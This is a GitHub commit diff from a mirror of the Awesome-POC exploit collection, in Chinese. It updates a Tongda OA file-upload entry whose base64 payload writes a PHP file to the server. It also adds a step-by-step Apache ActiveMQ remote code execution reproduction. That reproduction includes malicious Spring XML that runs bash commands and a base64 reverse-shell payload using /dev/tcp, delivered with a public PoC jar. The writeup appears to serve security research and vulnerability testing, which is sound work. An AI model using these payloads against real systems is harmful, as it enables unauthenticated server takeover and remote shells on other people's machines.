mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 02:37:58 +00:00
更新漏洞
This commit is contained in:
Threekiii
parent
ed44f79920
commit
3a81e5cf6d
@ -2,7 +2,7 @@
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器
|
||||
通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件控制服务器
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
@ -37,7 +37,8 @@ Content-Type: application/octet-stream
|
||||
参数a base解码
|
||||
|
||||
```
|
||||
ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==file_put_contents('../../fb6790f4.php','');
|
||||
ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==
|
||||
file_put_contents('../../fb6790f4.php','');
|
||||
```
|
||||
|
||||
|
||||
|
||||
@ -1,3 +1,5 @@
|
||||
# 通达OA v2017 action_upload.php 任意文件上传漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
|
||||
@ -63,4 +65,7 @@ submit
|
||||
|
||||
再访问上传的文件
|
||||
|
||||
|
||||
|
||||
|
||||
利用工具:https://github.com/Fu5r0dah/TongdaScan_go
|
||||
|
||||
|
||||
@ -466,6 +466,7 @@
|
||||
* Apache ActiveMQ Console控制台默认弱口令
|
||||
* Apache ActiveMQ 信息泄漏漏洞 CVE-2017-15709
|
||||
* Apache ActiveMQ 反序列化漏洞 CVE-2015-5254
|
||||
* Apache ActiveMQ远程代码执行
|
||||
* Apache Axis 远程代码执行漏洞 CVE-2019-0227
|
||||
* Apache Cocoon XML注入 CVE-2020-11991
|
||||
* Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706
|
||||
|
||||
113
Web服务器漏洞/Apache ActiveMQ远程代码执行.md
Normal file
113
Web服务器漏洞/Apache ActiveMQ远程代码执行.md
Normal file
@ -0,0 +1,113 @@
|
||||
# Apache ActiveMQ远程代码执行
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Apache ActiveMQ 是 Apache 软件基金会研发的一个开源消息中间件,为应用程序提供高效的、可扩展的、稳定的和安全的企业级消息通信。
|
||||
|
||||
当未经身份认证的攻击者访问 Apache ActiveMQ 的 61616 端口时,可通过发送恶意数据在远程服务器上执行代码,进而控制 Apache ActiveMQ 服务器。
|
||||
|
||||
更新日期:2023-10-25
|
||||
|
||||
参考链接:
|
||||
|
||||
- https://activemq.apache.org/activemq-5016006-release
|
||||
- https://github.com/Fw-fW-fw/activemq_Throwable
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
Apache ActiveMQ < 5.18.3
|
||||
```
|
||||
|
||||
## 环境搭建
|
||||
|
||||
在 ActiveMQ 官方下载 5.16.6 版本安装包,链接:https://activemq.apache.org/activemq-5016006-release
|
||||
|
||||
解压安装包,在目录 ./apache-activemq-5.16.6/bin/linux-x86-64 下以控制台模式启动,方便排查报错信息,注意使用 jdk 11:
|
||||
|
||||
```
|
||||
./activemq console
|
||||
```
|
||||
|
||||
|
||||
|
||||
访问 8161 端口管理页面:
|
||||
|
||||
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
编写 poc.xml,托管在 8080 端口。开启 http 服务:
|
||||
|
||||
```
|
||||
python3 -m http.server 8080
|
||||
```
|
||||
|
||||
|
||||
|
||||
执行命令:
|
||||
|
||||
```
|
||||
touch /tmp/success
|
||||
-------
|
||||
base64编码:dG91Y2ggL3RtcC9zdWNjZXNz
|
||||
```
|
||||
|
||||
poc.xml(注意缩进):
|
||||
|
||||
```
|
||||
<beans xmlns="http://www.springframework.org/schema/beans"
|
||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||
xsi:schemaLocation="
|
||||
http://www.springframework.org/schema/beans
|
||||
http://www.springframework.org/schema/beans/spring-beans.xsd">
|
||||
|
||||
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
|
||||
<constructor-arg >
|
||||
<list>
|
||||
<value>bash</value>
|
||||
<value>-c</value>
|
||||
<value>{echo,dG91Y2ggL3RtcC9zdWNjZXNz}|{base64,-d}|{bash,-i}</value>
|
||||
</list>
|
||||
</constructor-arg>
|
||||
</bean>
|
||||
</beans>
|
||||
```
|
||||
|
||||
使用 [poc](https://github.com/Fw-fW-fw/activemq_Throwable) 进行复现:
|
||||
|
||||
```
|
||||
java -jar activemq_poc.jar 127.0.0.1 61616 http://127.0.0.1:8080/poc.xml
|
||||
```
|
||||
|
||||
成功执行 `touch /tmp/success`:
|
||||
|
||||
|
||||
|
||||
反弹 shell 的 poc.xml:
|
||||
|
||||
```
|
||||
<beans xmlns="http://www.springframework.org/schema/beans"
|
||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||
xsi:schemaLocation="
|
||||
http://www.springframework.org/schema/beans
|
||||
http://www.springframework.org/schema/beans/spring-beans.xsd">
|
||||
|
||||
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
|
||||
<constructor-arg >
|
||||
<list>
|
||||
<value>bash</value>
|
||||
<value>-c</value>
|
||||
<value>{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}</value>
|
||||
|
||||
</list>
|
||||
</constructor-arg>
|
||||
</bean>
|
||||
</beans>
|
||||
```
|
||||
|
||||
|
||||
|
||||
## 修复建议
|
||||
|
||||
根据影响版本中的信息,排查并升级到安全版本,或直接访问参考链接获取官方更新指南。补丁下载链接:https://github.com/apache/activemq/tags
|
||||
BIN
Web服务器漏洞/images/image-20231027181843920.png
Normal file
BIN
Web服务器漏洞/images/image-20231027181843920.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 59 KiB |
BIN
Web服务器漏洞/images/image-20231027181920007.png
Normal file
BIN
Web服务器漏洞/images/image-20231027181920007.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 191 KiB |
BIN
Web服务器漏洞/images/image-20231027181935525.png
Normal file
BIN
Web服务器漏洞/images/image-20231027181935525.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 42 KiB |
BIN
Web服务器漏洞/images/image-20231030083005877.png
Normal file
BIN
Web服务器漏洞/images/image-20231030083005877.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 31 KiB |
BIN
Web服务器漏洞/images/image-20231030090050081.png
Normal file
BIN
Web服务器漏洞/images/image-20231030090050081.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 73 KiB |
BIN
Web服务器漏洞/images/image-20231030091008369.png
Normal file
BIN
Web服务器漏洞/images/image-20231030091008369.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 22 KiB |
Loading…
x
Reference in New Issue
Block a user